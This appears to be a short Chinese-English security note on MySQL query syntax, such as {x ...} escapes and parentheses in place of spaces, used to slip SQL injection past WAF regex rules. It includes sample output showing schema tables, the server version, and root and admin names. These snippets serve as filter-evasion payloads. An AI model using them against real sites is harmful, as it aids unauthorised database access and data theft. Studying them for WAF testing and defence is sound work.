mysql syntax bypass some WAF

select{x table_name}from{x information_schema.tables}

mysql> select{x table_name}from{x information_schema.tables};
+----------------------------------------------------+
| table_name                                         |
+----------------------------------------------------+
| CHARACTER_SETS                                     |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMNS                                            |
| COLUMN_PRIVILEGES                                  |
| ENGINES                                            |

mysql> select{x version()}from{x user};
+---------------+
| {x version()} |
+---------------+
| 5.5.20-log    |
| 5.5.20-log    |
| 5.5.20-log    |
| 5.5.20-log    |
+---------------+
4 rows in set (0.00 sec)

select{x a}from{x b} . b为当前数据库存在的任意表名。 a就是你要返回的内容。唔 ，我所能想到的场景就是获取user() ,version()之类的 {}代替空格绕过正则的检测啥的。。那我们直接 select{x (user())}或者 select(user())也可以。。
要获取其它信息的话，像这样。

mysql> select{x (select user from user limit 1)} from{x user};
+-------------------------------------+
| {x (select user from user limit 1)} |
+-------------------------------------+
| root                                |
| root                                |
| root                                |
| root

mysql> select{x(name)}from{x(manager)};
+--------+
| name |
+--------+
| admin  |
+--------+
1 row in set (0.00 sec)

可以这样玩，去掉空格

接用圆括号不就好啦!

such as:
select(host)from(mysql.user);
SELECT(UNHEX(UNHEX(333532453335324533323335)));

直接用括号某些WAF的规则是可以匹配到的

select{x+table_name}from{x(information_schema.tables)}

https://twitter.com/Black2Fan/status/564746640138182656 http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024